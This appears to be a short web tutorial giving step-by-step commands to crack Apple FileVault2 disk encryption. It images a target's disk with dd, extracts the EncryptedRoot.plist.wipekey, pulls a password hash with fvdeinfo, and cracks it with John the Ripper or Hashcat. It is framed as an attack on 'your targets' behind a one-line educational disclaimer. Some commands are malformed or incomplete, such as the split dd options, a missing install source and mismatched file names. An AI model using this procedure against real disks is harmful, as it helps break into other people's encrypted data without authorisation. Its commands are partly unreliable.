How to Crack Apple’s FileVault2 Encryption

How to Crack Apple’s FileVault2 Encryption

Here’s The Tut To Crack Apple’s FileVault2 Encryption

Purely For Educational Purpose Only, We Don’t Encourage Any Illegal Activities.

STEP 1: Use dd to extract image of your targets FileVault2 encrypted disk:

sudo dd if=/dev/disk2 of=/path/to/filevault_image.dd

conv = noerr, sync

STEP 2: Install fvde2john from

STEP 3: Use hdiutil to attach to dd image:

hdiutil attach -imagekey diskimage-class=CRawDiskImage -nomount /Volumes/path/to/filevault_image.dd

STEP 4: Obtain the EncryptedRoot.plist.wipekey from “Recovery HD” partition

mmls /Volumes/path/to/filevault_image.dd

fls -r -o 50450752 /Volumes/path/to/filevault_image.dd | grep -i EncryptedRoot

icat -o 50450752 image.raw 130 > EncryptedRoot.plist.wipekey

STEP 5: Verify and note the disk mount point for Apple_Corestorage:

diskutil list

…/dev/disk3s2 Apple_Corestorage

STEP 6: Use EncryptedRoot.plist.wipekey with fvdeinfo to retrieve the hash:

sudo fvdetools/fvdeinfo -e EncryptedRoot.plist.wipekey -p blablah /dev/disk3s2

Will return hash

FINAL STEP : Load this hash into JTR or Hashcat to crack it:

john --format=FVDE-opencl --wordlist=dict.txt hash.txt

hashcat -a 0 -m 16700 hash.txt dict.txt